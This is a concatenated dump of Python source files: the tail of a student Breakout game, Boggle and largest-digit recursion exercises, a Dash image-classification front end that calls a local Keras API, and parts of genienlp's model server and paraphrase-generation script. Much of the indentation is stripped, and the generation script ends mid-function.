brick_i.fill_color = "red"
elif j < 4:
brick_i.filled = True
brick_i.fill_color = "orange"
elif j < 6:
brick_i.filled = True
brick_i.fill_color = "yellow"
elif j < 8:
brick_i.filled = True
brick_i.fill_color = "green"
elif j < 10:
brick_i.filled = True
brick_i.fill_color = "blue"
i += 1
elif i == 10:
j += 1
i = 0
elif j == 10:
break
onmousemoved(self.paddle_move)
onmouseclicked(self.ball_move)
def ball_move(self,event):
if self.ball.x == self.window.width/2 and self.ball.y == self.window.height-self.paddle_height-PADDLE_OFFSET:
while self.live >0:
pause(self.frame_rate)
self.detect_object()
self.ball.move(self.__dx,self.__dy)
if self.ball.x >= self.window.width or self.ball.x <= 0:
self.__dx = - self.__dx
elif self.ball.y <= 0:
self.__dy = - self.__dy
elif self.ball.y >= self.window.height:
self.live -= 1
break
self.reset_ball_position()
#self.window.add(self.ball,self.window.width/2 , self.window.height-self.paddle_height-PADDLE_OFFSET)
"""
def ball_move_velocity(self):
self.dx = random.randint(1, MAX_X_SPEED)
self.dy = random.randint(2, INITIAL_Y_SPEED)
if (random.random()) > 0.5:
self.dx = -self.dx
if (random.random()) > 0.5:
self.dy = -self.dy
self.ball.move(self.dx,self.dy)
"""
def paddle_move(self, event):
"""
this function is for onmousemoved
to create a moving paddle
"""
self.paddle.x = event.x - self.paddle.width/2
self.paddle.y = self.window.height -PADDLE_OFFSET
def detect_object(self):
"""
this function is built to detect the bricks and the paddle correctly
"""
obj_left_up = self.window.get_object_at(self.ball.x, self.ball.y)  # upper-left corner
obj_left_down = self.window.get_object_at(self.ball.x, self.ball.y +2 * BALL_RADIUS)
obj_right_up = self.window.get_object_at(self.ball.x + 2 * BALL_RADIUS, self.ball.y)
obj_right_down = self.window.get_object_at(self.ball.x + 2 * BALL_RADIUS, self.ball.y +2 * BALL_RADIUS)
if self.ball.y < self.window.height - PADDLE_OFFSET- 2*self.paddle_height:
#if obj_right_down is None and obj_left_down is None:
if obj_left_up is not None:
self.__dy = -self.__dy
self.remove_stuff(obj_left_up)
if obj_right_up is not None:
self.remove_stuff(obj_right_up)
#if obj_right_up is None and obj_left_up is None:
if obj_left_down is not None:
self.remove_stuff(obj_left_down)
self.__dy = -self.__dy
if obj_right_down is not None:
self.remove_stuff(obj_right_down)
#if obj_right_up is None and obj_right_down is None:
if obj_left_up is not None:
self.remove_stuff(obj_left_up)
self.__dx = -self.__dx
if obj_left_down is not None:
self.remove_stuff(obj_left_down)
#if obj_left_up is None and obj_left_down is None:
if obj_right_up is not None:
self.remove_stuff(obj_right_up)
self.__dx = -self.__dx
if obj_right_down is not None:
self.remove_stuff(obj_right_down)
if self.ball.y >= self.window.height - PADDLE_OFFSET- self.paddle_height:
if obj_left_down is not None or obj_right_down is not None:
self.__dy = -self.__dy
def remove_stuff(self, obj):
self.window.remove(obj)
def reset_ball(self):
""""
if the ball drops beneath window.height, we will reset the ball
"""
self.reset_ball_position()
def reset_ball_position(self):
"""
and we need to reset the position of the ball
"""
self.ball.x = self.window.width/2
self.ball.y = self.window.height-PADDLE_OFFSET-PADDLE_HEIGHT
def reset_ball_velocity(self):
"""
reset the ball velocity also
"""
self.__dx = random.randint(2,MAX_X_SPEED)
self.__dy = INITIAL_Y_SPEED
if (random.random()) > 0.5:
self.__dx = -self.__dx
# self.ball = GOval(ball_radius,ball_radius)
#self.ball.filled = True
#self.ball.fill_color = "darkred"
#self.window.add(self.ball,self.window.width/2, self.window.height-PADDLE_OFFSET-PADDLE_HEIGHT)
# Center a filled ball in the graphical window.
# Default initial velocity for the ball.
# Initialize our mouse listeners.
# Draw bricks.
```
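Because the mouse listeners are registered inside `__init__` (the paddle follows the mouse and a click starts the ball), the companion driver file for this assignment needs little more than constructing the class. A hedged sketch of such a driver; the module and class names match this file, everything else is an assumption:
```python
# Hedged sketch of a minimal driver; the assignment's actual breakout.py may
# structure its main function differently.
from breakoutgraphics import BreakoutGraphics

def main():
    # Constructing the window registers onmousemoved/onmouseclicked, so the
    # game starts animating on the first click.
    BreakoutGraphics()

if __name__ == '__main__':
    main()
```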
#### File: SC101-projects/SC101_Assignment5/boggle.py
```python
FILE = 'dictionary.txt'
Python_List = []
Count = 0
Found_List = []
def main():
"""
TODO:
"""
i = 0
row = []
for i in range(0,4):
row_i = input(f"{i+1} row of letter:").lower()
row_i = list(row_i)
row.append(row_i)
if len(row_i) != 4: # let's first forget about the blank issue
print("Illegal input")
else:
i += 1
read_dictionary()
boggle(row)
print(f"There are {len(Found_List)} words in total!")
print("done searching yaya ")
def read_dictionary():
"""
This function reads file "dictionary.txt" stored in FILE
and appends words in each line into a Python list
"""
global Python_List
with open(FILE, "r") as f:
for word in f:
word = word.strip("\n")
Python_List.append(word)
def boggle(row):
print("searching...")
    for i in range(4):  # build a coordinate system for the 4x4 board
for j in range(4):
boggle_helper(row, [i, j], [], "", i, j)
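# A rough usage sketch (hypothetical 4x4 board, not part of the original file):
#   board = [list("abcd"), list("efgh"), list("ijkl"), list("mnop")]
#   read_dictionary()
#   boggle(board)  # depth-first search from every (i, j) cell, pruned by has_prefix()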
def boggle_helper(row, used_position, used_position_list, cur_str, x, y):
global Found_List
used_position_list.append(used_position)
if cur_str in Python_List and len(cur_str) >= 4: # base case
if cur_str not in Found_List:
Found_List.append(cur_str)
print(f"Found: {cur_str}")
boggle_helper(row, [x, y], used_position_list, cur_str, x, y)
        used_position_list.pop()  # after finding a word, pop its position so other paths can still use it
    for i in range(-1, 2):  # recursive case (no else: even after finding a word, keep searching for longer words instead of stopping)
for j in range(-1, 2):
new_x = x + i
new_y = y + j
            if len(cur_str) == 0:  # starting a new word from this cell
cur_str += row[x][y]
            if [new_x, new_y] not in used_position_list:  # the new (new_x, new_y) has not been visited on this path
if 0 <= new_x < 4 and 0 <= new_y < 4:
                    cur_str += row[new_x][new_y]  # append the new letter to the current string
                    if has_prefix(cur_str):  # check whether any dictionary word starts with cur_str
                        boggle_helper(row, [new_x, new_y], used_position_list, cur_str, new_x, new_y)  # if so, keep extending through new neighbors
                        cur_str = cur_str[:len(cur_str) - 1]  # backtrack: drop the letter we just added
                        used_position_list.pop()  # and remove its position from used_position_list
                    else:
                        cur_str = cur_str[:len(cur_str) - 1]  # no dictionary word starts with cur_str; drop the letter
def has_prefix(sub_s):
global Count
    for word in Python_List:
        if word.startswith(sub_s):
            return True
    return False
if __name__ == '__main__':
main()
```
#### File: SC101-projects/SC101_Assignment5/largest_digit.py
```python
largest_digit = 0
def main():
#print(find_largest_digit(12345)) # 5
print(find_largest_digit(281)) # 8
#print(find_largest_digit(6)) # 6
#print(find_largest_digit(-111)) # 1
#print(find_largest_digit(-9453)) # 9
def find_largest_digit(n):
#global largest_digit
#largest_digit = 0
#find_digit_helper(n)
# def find_digit_helper(n):
global largest_digit
if n == 0:
pass
else:
        # handle negative numbers
if n < 0:
n = -n
        last_digit = n % 10  # take the remainder (the current last digit)
        if last_digit > largest_digit:  # compare the new last digit with the largest seen so far
largest_digit = last_digit
find_largest_digit(n//10)
return largest_digit
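# A rough trace of the recursion above (assuming the module-level largest_digit is still 0):
#   find_largest_digit(281) -> last digits seen: 1, 8, 2 -> returns 8
# Note the global is never reset, so this holds only for the first call in a run.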
if __name__ == '__main__':
main()
``` |
{
"source": "JonathanChiang/DashNeuro",
"score": 3
} |
#### File: JonathanChiang/DashNeuro/app_table.py
```python
import dash
import dash_table
import pandas as pd
from dash.dependencies import Input, Output, State
import dash_core_components as dcc
import dash_html_components as html
import dash_bootstrap_components as dbc
import os
# USAGE
# python simple_request.py
# import the necessary packages
import requests
# initialize the Keras REST API endpoint URL along with the input
# image path
KERAS_REST_API_URL = "http://localhost:5000/predict"
script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in
app = dash.Dash( external_stylesheets=[dbc.themes.BOOTSTRAP])
app.css.config.serve_locally = True
app.scripts.config.serve_locally = True
app.layout = html.Div([
dcc.Upload(
id='upload-data',
children=html.Div([
html.A('Run Inference')
]),
style={
'width': '50%',
'height': '60px',
'lineHeight': '60px',
'borderWidth': '1px',
'borderStyle': 'dashed',
'borderRadius': '5px',
'textAlign': 'center'
},
multiple=False
),
html.Div(id='output-data-upload')
])
@app.callback(dash.dependencies.Output('output-data-upload', 'children'),
[dash.dependencies.Input('upload-data', 'contents'),
dash.dependencies.Input('upload-data', 'filename')])
def update_output(contents, filename):
if contents is not None:
script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in
rel_path = "/images/" + filename
IMAGE_PATH = script_dir + rel_path
# load the input image and construct the payload for the request
image = open(IMAGE_PATH, "rb").read()
payload = {"image": image}
# submit the request
r = requests.post(KERAS_REST_API_URL, files=payload).json()
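        # The endpoint is assumed to return JSON shaped roughly like
        # {"success": true, "predictions": [{"label": "...", "probability": 0.93}, ...]};
        # the exact prediction keys are an assumption based on how the response is used below.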
        # ensure the request was successful
if r["success"]:
# loop over the predictions and display them
df = pd.json_normalize(r["predictions"])
df["probability"] = 100 * df["probability"]
df = df.round({'probability': 2})
df = df.rename(str.upper, axis='columns')
return html.Div([
html.Hr(),
html.Img(src=contents),
html.Hr(),
dash_table.DataTable(
id='table',
columns=[{"name": i, "id": i} for i in df.columns],
data=df.to_dict("rows"),
style_cell={'width': '25px',
'fontSize':20,
'font-family':'sans-serif',
'height': '50px',
'color' : 'black',
'textAlign': 'center'}
),
],style={'columnCount': 1})
# otherwise, the request failed
else:
print("Request failed")
if __name__ == "__main__":
app.run_server(debug=True,threaded=True)
``` |
{
"source": "Jonathan-Chin328/genienlp",
"score": 2
} |
#### File: genienlp/genienlp/kfserver.py
```python
import logging
import kfserving
from .util import log_model_size
from .server import Server, init
logger = logging.getLogger(__name__)
class KFModelServer(kfserving.KFModel):
def __init__(self, name, args, numericalizer, model, device, confidence_estimator):
super().__init__(name)
self.server = Server(args, numericalizer, model, device, confidence_estimator)
def load(self):
log_model_size(logger, self.server.model, self.server.args.model)
self.server.model.to(self.server.device)
self.server.model.eval()
self.ready = True
def predict(self, request):
results = self.server.handle_request(request)
return {"predictions": results}
def main(args):
model, device, confidence_estimator = init(args)
model_server = KFModelServer(args.inference_name, args, model.numericalizer, model, device, confidence_estimator)
model_server.load()
kfserving.KFServer(workers=1).start([model_server])
```
#### File: genienlp/paraphrase/run_generation.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import math
import json
import re
import copy
import os
import numpy as np
# multiprocessing with CUDA
from torch.multiprocessing import Process, set_start_method
from genienlp.paraphrase.data_utils import create_features_from_tsv_file, output_heuristics
from genienlp.paraphrase.model_utils import compute_metrics, compute_attention, replace_quoted_params, force_replace_quoted_params
from ..tasks.almond_utils import tokenize_cjk_chars
from ..data_utils.progbar import prange
try:
set_start_method('spawn')
except RuntimeError:
pass
import torch
from transformers import GPT2_PRETRAINED_CONFIG_ARCHIVE_MAP, T5_PRETRAINED_CONFIG_ARCHIVE_MAP
from .transformers_utils import BART_PRETRAINED_CONFIG_ARCHIVE_MAP, MARIAN_PRETRAINED_CONFIG_ARCHIVE_MAP
from transformers import GPT2Tokenizer, T5Tokenizer, MarianTokenizer, BartTokenizer
from .transformers_utils import GenieMarianMTModel, GenieBartForConditionalGeneration, GenieMBartForConditionalGeneration,\
GenieT5ForConditionalGeneration, GenieMT5ForConditionalGeneration
from .transformers_utils import GenieMBartTokenizer
from transformers import PretrainedConfig
from ..util import set_seed, combine_files_on_disk, split_file_on_disk, get_part_path
from .GPT2Seq2Seq import GPT2Seq2Seq
from .data_utils import group_together
from .model_utils import check_args
logging.basicConfig(format = '%(asctime)s - %(levelname)s - %(name)s - %(message)s',
datefmt = '%m/%d/%Y %H:%M:%S',
level = logging.INFO)
logger = logging.getLogger(__name__)
ALL_MODELS = sum((tuple(map.keys()) for map in (GPT2_PRETRAINED_CONFIG_ARCHIVE_MAP, T5_PRETRAINED_CONFIG_ARCHIVE_MAP,
BART_PRETRAINED_CONFIG_ARCHIVE_MAP, MARIAN_PRETRAINED_CONFIG_ARCHIVE_MAP)), ())
MODEL_CLASSES = {
'gpt2': (GPT2Seq2Seq, GPT2Tokenizer, {'bos_token': '<unk>', 'sep_token': '<paraphrase>', 'eos_token': '</paraphrase>'}),
't5': (GenieT5ForConditionalGeneration, T5Tokenizer, {'bos_token': '<unk>', 'sep_token': '<unk>', 'eos_token': '</s>'}),
'mt5': (GenieMT5ForConditionalGeneration, T5Tokenizer, {'bos_token': '<unk>', 'sep_token': '<unk>', 'eos_token': '</s>'}),
'bart': (GenieBartForConditionalGeneration, BartTokenizer, {'bos_token': '<s>', 'sep_token': '<unk>', 'eos_token': '</s>'}),
'mbart': (GenieMBartForConditionalGeneration, GenieMBartTokenizer, {'bos_token': '<s>', 'sep_token': '<unk>', 'eos_token': '</s>'}),
'marian': (GenieMarianMTModel, MarianTokenizer, {'bos_token': '<unk>', 'sep_token': '<unk>', 'eos_token': '</s>'}),
}
def parse_argv(parser):
parser.add_argument("--model_name_or_path", default=None, type=str, required=True,
help="Path to pre-trained model or shortcut name selected in the list: " + ", ".join(ALL_MODELS))
parser.add_argument("--input_file", type=str, help="The file from which we read prompts. Defaults to stdin.")
parser.add_argument('--input_column', type=int, required=True,
help='The column in the input file which contains the input sentences.')
parser.add_argument('--prompt_column', type=int, default=None,
help='The column in the input file which contains the text we should start generation from.')
parser.add_argument('--gold_column', type=int, default=None,
help='The column in the input file which contains the gold sentences. Defaults to --input_column if no gold is available.')
parser.add_argument('--thingtalk_column', type=int, default=None,
help='The column in the input file which contains the ThingTalk program.')
parser.add_argument('--id_column', type=int, default=None,
help='The column in the input file which contains the example ID.')
parser.add_argument("--output_file", type=str, help="When specified, generated text will be written in this file. Defaults to stdout.")
parser.add_argument("--intermediate_file", type=str, default='./paraphrase_tmp.tsv', help="Used to save intermediate results.")
parser.add_argument('--output_prompt', action='store_true',
help='Whether we should include the prompt (specified via --prompt_column or --copy) in the output sequence')
parser.add_argument("--length", type=int, default=15, help='The generated sentences will have a maximum length of len(input) + arg.length')
parser.add_argument("--min_output_length", type=int, default=2, help='Will prevent stop tokens from appearing in the first --min_output_length tokens of the generated sentences.')
parser.add_argument("--skip_heuristics", action='store_true', help='If True, will not replace special word such as NUMBER_0 in the input.')
parser.add_argument("--is_cased", action='store_true',
help='If True, the trained model is cased, so if --skip_heuristics is not set, we will convert the input to upper case and the output back to lower case.')
parser.add_argument("--metric_reduction", type=str, choices=['average', 'max'], default='average',
help="How we should calculate metrics where there are multiple generations per example.")
parser.add_argument("--shuffle_input", action='store_true', help='If set, we will shuffle input dataset before processing it'
'Used mainly with subsampling so we take different portion of data each time')
parser.add_argument("--pipe_mode", action='store_true', help='If set, we will generate paraphrases of paraphrases of ... as well.')
# These are generation hyperparameters. Each one can be a list of values in which case, we generate num_samples outputs for each set of hyperparameters.
parser.add_argument("--num_samples", type=int, nargs='+', default=[1])
parser.add_argument("--temperature", type=float, nargs='+', default=[1.0],
help="temperature of 0 implies greedy sampling")
parser.add_argument("--repetition_penalty", type=float, nargs='+', default=[1.0],
help="primarily useful for CTRL model; in that case, use 1.2")
parser.add_argument("--top_k", type=int, nargs='+', default=[0], help='0 disables top-k filtering')
parser.add_argument("--top_p", type=float, nargs='+', default=[0.9], help='1.0 disables top-p filtering')
parser.add_argument("--num_beams", type=int, nargs='+', default=[1], help='1 disables beam seach')
parser.add_argument("--no_repeat_ngram_size", type=int, nargs='+', default=[0], help='ngrams of this size cannot be repeated in the output. 0 disables it.')
parser.add_argument("--copy", type=int, default=0,
help='Number of tokens that will be copied at the beginning of generation. Helps preserve the original meaning of the input sequence.')
parser.add_argument("--no_cuda", action='store_true',
help="Avoid using CUDA when available")
parser.add_argument('--seed', type=int, default=42,
help="random seed for initialization")
parser.add_argument('--stop_tokens', type=str, nargs='+', default=[],
help="Tokens (other than the model-specific `eos_token`) at which text generation should be stopped.")
parser.add_argument('--batch_size', type=int, default=4,
help="Batch size for text generation for each GPU.")
parser.add_argument('--pad_token', type=str, default='<pad>',
help='The special token for padding, if tokenizer does not have that')
    parser.add_argument('--cache_dir', default='.embeddings', type=str, help='where to save transformers cached models, configs, and tokenizers.')
parser.add_argument('--trained_model_type', type=str, help='if provided we make sure the loaded model matches the model_type')
parser.add_argument('--src_lang', type=str, help='source language used for translation task')
parser.add_argument('--tgt_lang', type=str, help='target language used for translation task')
parser.add_argument('--output_attentions', action='store_true', help='return self and cross attention weights for seq2seq models')
parser.add_argument('--output_hidden_states', action='store_true', help='return all hidden states for seq2seq models')
parser.add_argument('--att_pooling', type=str, default='max', help='pooling used to calculate decoder-encoder attention values across different heads')
parser.add_argument('--plot_heatmaps', action='store_true', help='whether to plot decoder-encoder attention heatmaps')
parser.add_argument('--replace_qp', action='store_true', help='replace parameter values after translation with source values')
    parser.add_argument('--force_replace_qp', action='store_true', help='if the parameters could not be replaced by leveraging quotation marks,'
                                                ' rely purely on attention to find text spans')
parser.add_argument('--subsample', type=int, default=20000000, help='subsample input datasets')
parser.add_argument('--task', type=str, required=True, choices=['paraphrase', 'translate'])
parser.add_argument("--output_example_ids_too", action='store_true', help='Generate two column output with ids in the first column')
parser.add_argument('--mask_tokens', action='store_true', help='mask input tokens and infill them using denoising pretrained model')
parser.add_argument('--mask_token_prob', type=float, default=0.15, help='Probability of an input token being masked in the sentence')
    parser.add_argument('--delete_tokens', action='store_true', help='delete input tokens and infill them using a denoising pretrained model. '
                                                 'In contrast to token masking, the model should decide which positions have missing inputs')
parser.add_argument('--delete_token_prob', type=float, default=0.15, help='Probability of an input token being deleted in the sentence')
parser.add_argument('--infill_text', action='store_true', help='mask consecutive tokens and infill them using denoising pretrained model')
parser.add_argument('--num_text_spans', type=int, default=3, help='number of text spans to sample for text infilling method')
parser.add_argument('--infill_max_tries', type=int, default=3, help='Maximum number of tries to find an appropriate span')
    parser.add_argument('--permute_sentences', action='store_true', help='divide the document into sentences based on full stops and '
                                                  'permute them. Use this only if the input has multiple sentences.')
parser.add_argument('--rotate_sentence', action='store_true', help='a pivot token is chosen randomly, and sentence is rotated so new sentence start with pivot token')
parser.add_argument('--fp16', action='store_true',
help="Whether to use 16-bit (mixed) precision (through NVIDIA apex) instead of 32-bit. On certain GPUs (e.g. Nvidia V100) improves the inference speed")
parser.add_argument('--fp16_opt_level', type=str, default='O1',
help="For fp16: Apex AMP optimization level selected in ['O0', 'O1', 'O2', and 'O3']."
"See details at https://nvidia.github.io/apex/amp.html")
parser.add_argument('--verbose', action='store_true', help='log additional information for debugging purposes')
parser.add_argument('--no_fast_tokenizer', action='store_true', help='Use slow version of huggingface tokenizer')
def main(args):
hyperparameters = ['num_samples', 'temperature', 'top_k', 'top_p', 'repetition_penalty', 'num_beams', 'no_repeat_ngram_size']
max_hyperparameter_len = max([len(getattr(args, h)) for h in hyperparameters])
valid_len = [1, max_hyperparameter_len]
for h in hyperparameters:
if (len(getattr(args, h)) not in valid_len):
logger.error('Hyperparameters should either have the same number of values as others or have exactly one value.')
# If only one value is provided, use the same value for all samples
setattr(args, h, getattr(args, h) * (max_hyperparameter_len // len(getattr(args, h))))
    logger.info('Will output %d sequences for each input.', sum(args.num_samples) if not args.pipe_mode else np.prod(args.num_samples))
logger.info('Effective batch size for each GPU is %d', args.batch_size*max(args.num_samples))
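    # Example of the broadcasting above (hypothetical invocation):
    #   --temperature 0.5 --top_k 10 20  ->  args.temperature becomes [0.5, 0.5]
    # so every generation hyperparameter ends up with max_hyperparameter_len values.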
# TODO using intermediate files for pipe_mode is not clean. It needs to change.
if args.pipe_mode:
intermediate_files = [args.input_file] + [args.intermediate_file+str(i) for i in range(max_hyperparameter_len)]
for i in range(max_hyperparameter_len):
copy_args = copy.copy(args)
for h in hyperparameters:
setattr(copy_args, h, [getattr(args, h)[i]])
copy_args.input_file = intermediate_files[i]
copy_args.output_file = intermediate_files[i+1]
run_multi_process_generation(copy_args)
all_outputs = group_together(intermediate_files[1:], args.num_samples)
for file_path in intermediate_files[1:]:
os.remove(file_path)
if args.output_file is not None:
if not os.path.exists(os.path.dirname(args.output_file)):
os.makedirs(os.path.dirname(args.output_file), exist_ok=False)
with open(args.output_file, 'w') as output_file:
for output in all_outputs:
for text in output:
output_file.write(text + '\n')
else:
print(json.dumps(all_outputs, indent=2))
else:
run_multi_process_generation(args)
def run_multi_process_generation(args):
config = PretrainedConfig.from_pretrained(args.model_name_or_path, cache_dir=args.cache_dir)
# get model type from saved config
if hasattr(config, 'model_type'):
args.model_type = getattr(config, 'model_type')
else:
raise ValueError('Model should be either GPT2, BART, MBART, or Marian')
# check arguments validity
check_args(args)
if sum([args.mask_tokens, args.delete_tokens, args.infill_text, args.permute_sentences, args.rotate_sentence]) >= 2:
raise ValueError('Mixing denoising techniques is unlikely to work. Please use one method per run')
if (args.mask_tokens or args.delete_tokens or args.rotate_sentence) and args.model_type == 'mbart':
raise ValueError('MBART is pretrained only with text_infilling and permute_sentences noising methods. '
'Applying other noising techniques is unlikely to work')
if args.trained_model_type and args.trained_model_type != '' and args.model_type != args.trained_model_type:
raise ValueError('The loaded model type does not match with what the user provided')
if args.prompt_column is not None and args.copy is not None and args.copy != 0:
raise ValueError('Cannot copy from the input and use prompt at the same time. Disable either --copy or --prompt_column.')
if args.gold_column is None:
args.gold_column = args.input_column
args.device = torch.device("cuda" if torch.cuda.is_available() and not args.no_cuda else "cpu")
args.n_gpu = torch.cuda.device_count()
if args.output_file is not None:
if not os.path.exists(os.path.dirname(args.output_file)):
os.makedirs(os.path.dirname(args.output_file), exist_ok=False)
set_seed(args)
if args.n_gpu > 1:
if args.input_file is None:
raise ValueError('Cannot use multiple GPUs when reading from stdin. You should provide an --input_file')
logger.info('Running generation in parallel on {} GPUs'.format(args.n_gpu))
# Independent multi-GPU generation
all_processes = []
all_input_files = split_file_on_disk(args.input_file, args.n_gpu)
for gpu_idx in range(args.n_gpu):
copy_args = copy.copy(args)
if torch.cuda.is_available() and not args.no_cuda:
copy_args.device = torch.device("cuda:" + str(gpu_idx))
copy_args.n_gpu = 1
copy_args.input_file = all_input_files[gpu_idx]
copy_args.output_file = get_part_path(args.output_file, gpu_idx)
p = Process(target=run_single_process_generation, args=(copy_args, config))
all_processes.append(p)
p.start()
for p in all_processes:
p.join()
for file in all_input_files:
os.remove(file)
combine_files_on_disk(args.output_file, args.n_gpu, line_group_size=sum(args.num_samples), delete=True)
else:
run_single_process_generation(args, config)
def run_single_process_generation(args, config):
model_class, tokenizer_class, special_tokens = MODEL_CLASSES[args.model_type]
output_attentions = args.output_attentions
output_hidden_states = args.output_hidden_states
model = model_class.from_pretrained(args.model_name_or_path,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
cache_dir=args.cache_dir)
model.to(args.device)
if args.fp16:
try:
from apex import amp
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
model = amp.initialize(model, opt_level=args.fp16_opt_level)
model.eval()
tokenizer = tokenizer_class.from_pretrained(args.model_name_or_path, cache_dir=args.cache_dir, use_fast=not args.no_fast_tokenizer)
eos_token_id = tokenizer.convert_tokens_to_ids(special_tokens['eos_token'])
sep_token_id = tokenizer.convert_tokens_to_ids(special_tokens['sep_token'])
if tokenizer.pad_token is None:
# this assigns pad token but doesn't add it to the vocabulary
tokenizer.pad_token = args.pad_token
pad_token_id = tokenizer.convert_tokens_to_ids(tokenizer.pad_token)
if pad_token_id is None:
logger.error('Your tokenizer does not have a padding token')
if args.model_type == 'gpt2':
model.set_token_ids(eos_token_id=eos_token_id,
sep_token_id=sep_token_id,
pad_token_id=pad_token_id)
logger.info(args)
model_input_prefix = ''
if args.model_type == 'marian' and args.tgt_lang:
# TODO check if extra space after pattern is necessary
model_input_prefix = '>>{}<< '.format(args.tgt_lang)
elif args.model_type == 't5':
if args.task == 'translate':
t5_task = 'translation_{}_to_{}'.format(args.src_lang, args.tgt_lang)
else:
t5_task = 'summarization'
model_input_prefix = config.task_specific_params[t5_task]['prefix']
masking_token = getattr(tokenizer, 'mask_token', '<mask>')
all_input_sequences, all_input_sequence_lengths, all_example_ids, all_context_ids, estimated_output_lengths, all_golds, reverse_maps, all_prompt_ids = \
create_features_from_tsv_file(file_path=args.input_file,
tokenizer=tokenizer,
input_column=args.input_column,
gold_column=args.gold_column,
id_column=args.id_column,
prompt_column=args.prompt_column,
thingtalk_column=args.thingtalk_column,
copy=args.copy,
sep_token_id=sep_token_id,
skip_heuristics=args.skip_heuristics,
is_cased=args.is_cased,
model_type=args.model_type,
src_lang=args.src_lang,
subsample=args.subsample,
shuffle_input=args.shuffle_input,
task=args.task,
model_input_prefix=model_input_prefix,
mask_tokens=args.mask_tokens,
mask_token_prob=args.mask_token_prob,
masking_token=masking_token,
infill_max_tries=args.infill_max_tries,
delete_tokens=args.delete_tokens,
delete_token_prob=args.delete_token_prob,
infill_text=args.infill_text,
num_text_spans=args.num_text_spans,
permute_sentences=args.permute_sentences,
rotate_sentence=args.rotate_sentence)
# sort contexts based on their context length so that less generated tokens are thrown away and generation can be done faster
estimated_output_lengths, all_input_sequence_lengths, all_input_sequences, all_context_ids, original_order, reverse_maps, all_prompt_ids = \
tuple(zip(*sorted(list(zip(estimated_output_lengths, all_input_sequence_lengths, all_input_sequences, all_context_ids, range(len(all_context_ids)), reverse_maps, all_prompt_ids)), reverse=True)))
all_outputs = []
stop_token_ids = [tokenizer.convert_tokens_to_ids(stop_token) for stop_token in args.stop_tokens]
batch_idx = 0
for batch in prange(math.ceil(len(all_context_ids) / args.batch_size)):
batch_slice = (batch*args.batch_size, min((batch+1)*args.batch_size, len(all_context_ids)))
batch_size = batch_slice[1] - batch_slice[0]
batch_context_tokens = all_context_ids[batch_slice[0]: batch_slice[1]]
batch_reverse_maps = reverse_maps[batch_slice[0]: batch_slice[1]]
batch_prompt_tokens = all_prompt_ids[batch_slice[0]: batch_slice[1]]
if args.model_type == 'gpt2':
batch_context_tensor = torch.tensor(model.pad_to_max_length(batch_context_tokens), dtype=torch.long, device=args.device)
attention_mask = None
else:
padded_batch_context_tokens = []
max_length = max([len(s) for s in batch_context_tokens])
for i in range(len(batch_context_tokens)):
padded_batch_context_tokens.append(batch_context_tokens[i]+[pad_token_id]*(max_length-len(batch_context_tokens[i])))
batch_context_tensor = torch.tensor(padded_batch_context_tokens, dtype=torch.long, device=args.device)
attention_mask = (batch_context_tensor!=pad_token_id).to(torch.long)
if args.model_type == 'mbart':
decoder_start_token_id = tokenizer.lang_code_to_id[args.tgt_lang]
model.config.decoder_start_token_id = decoder_start_token_id
else:
decoder_start_token_id = None
max_length = batch_context_tensor.shape[1] + args.length
all_encoder_attentions = None
batch_outputs = [[] for _ in range(batch_size)]
for hyperparameter_idx in range(len(args.temperature)):
outputs = model.generate(input_ids=batch_context_tensor,
bad_words_ids=None,
attention_mask=attention_mask,
decoder_start_token_id=decoder_start_token_id,
min_length=args.min_output_length,
max_length=max_length,
num_beams=args.num_beams[hyperparameter_idx],
top_k=args.top_k[hyperparameter_idx],
top_p=args.top_p[hyperparameter_idx],
early_stopping=True,
num_return_sequences=args.num_samples[hyperparameter_idx],
repetition_penalty=args.repetition_penalty[hyperparameter_idx],
no_repeat_ngram_size=args.no_repeat_ngram_size[hyperparameter_idx],
do_sample=args.temperature[hyperparameter_idx]!=0,
temperature=args.temperature[hyperparameter_idx] if args.temperature[hyperparameter_idx] > 0 else 1.0, # if temperature==0, we do not sample
eos_token_id=eos_token_id,
pad_token_id=pad_token_id,
use_cache=True,
output_attentions=output_attentions
)
# TODO fix the way output attention is handled. Some models do not support it.
if output_attentions:
decoded, all_encoder_attentions = outputs
else:
decoded = outputs
if not isinstance(decoded, list):
decoded = decoded[:, :].tolist()
for i, out in enumerate(decoded):
if args.model_type=='bart' or args.model_type=='mbart':
out = out[1:] # remove </s> token at the beginning
sample_index = (i//args.num_samples[hyperparameter_idx]) % batch_size
if not args.output_prompt:
out = out[len(batch_prompt_tokens[sample_index]):]
min_index = len(out)-1
for stop_token_id in stop_token_ids+[eos_token_id]:
try:
index = out.index(stop_token_id)
min_index = min(index, min_index)
except ValueError:
pass
### include eos_token too; it will get removed during decoding
min_index = min_index + 1
out_cropped = out[:min_index]
if args.task == 'translate' and output_attentions:
src_tokens = tokenizer.convert_ids_to_tokens(batch_context_tensor[sample_index])
tgt_tokens = tokenizer.convert_ids_to_tokens(out_cropped)
# get last layer attention vectors
layer_attention = all_encoder_attentions[-1]
sample_layer_attention = layer_attention[sample_index, :, :, :]
if tgt_tokens[0] in [tokenizer.pad_token, special_tokens['bos_token'], special_tokens['sep_token']] or \
(decoder_start_token_id and tgt_tokens[0] == tokenizer.id_to_lang_code[decoder_start_token_id]):
# shift target tokens left to match the attention positions
tgt_tokens = tgt_tokens[1:]
while src_tokens[-1] == tokenizer.pad_token:
# remove all padding from src
src_tokens = src_tokens[:-1]
if src_tokens[-1] == special_tokens['sep_token']:
# remove trailing sep token
src_tokens = src_tokens[:-1]
if src_tokens[-1] == special_tokens['eos_token']:
# remove end token for better heatmap representation
src_tokens = src_tokens[:-1]
# remove language code from the beginning of src_tokens and shift layer_attention
len_prefix_wp = len(tokenizer.tokenize(model_input_prefix))
src_tokens = src_tokens[len_prefix_wp:]
sample_layer_attention = sample_layer_attention[:, :, len_prefix_wp:]
# crop to match src and tgt new lengths
sample_layer_attention = sample_layer_attention[:, :len(tgt_tokens), :len(src_tokens)]
sample_layer_attention_pooled = compute_attention(sample_layer_attention, args.att_pooling)
if args.plot_heatmaps:
import matplotlib.pyplot as plt
import seaborn as sns
src_tokens = [token.lower() for token in src_tokens]
tgt_tokens = [token.lower() for token in tgt_tokens]
g = sns.heatmap(torch.log(sample_layer_attention_pooled), xticklabels=src_tokens,
yticklabels=tgt_tokens)
g.set_xticklabels(g.get_xmajorticklabels(), fontsize=12)
